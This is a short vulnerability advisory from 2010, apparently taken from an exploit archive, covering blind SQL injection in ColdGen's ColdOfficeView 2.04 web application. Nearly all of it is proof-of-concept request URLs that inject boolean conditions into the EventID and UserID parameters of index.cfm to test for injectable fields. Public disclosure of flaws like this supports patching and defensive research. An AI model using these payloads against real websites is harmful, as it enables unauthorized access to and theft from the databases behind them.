ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : ColdOfficeView 2.04 Multiple Blind SQL Injection Vulnerabilities
# Published : 2010-09-07
# Author : mr_me
# Previous Title : ColdUserGroup 1.06 Blind SQL Injection Exploit
# Next Title : ColdBookmarks 1.22 SQL Injection Vulnerability

# ColdGen - coldofficeview v2.04 Remote Blind SQL Injection vulnerabilities
# Vendor: http://www.coldgen.com/
# Found by: mr_me (net-ninja.net)

PoC's
1. http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=ViewEventDetails&EventID=1 and 1=2 << false

2. http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=[Blind SQLi]
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=1 << true
http://[target]/[path]/index.cfm?fuseaction=EditProfile&UserID=1 and 1=2 << false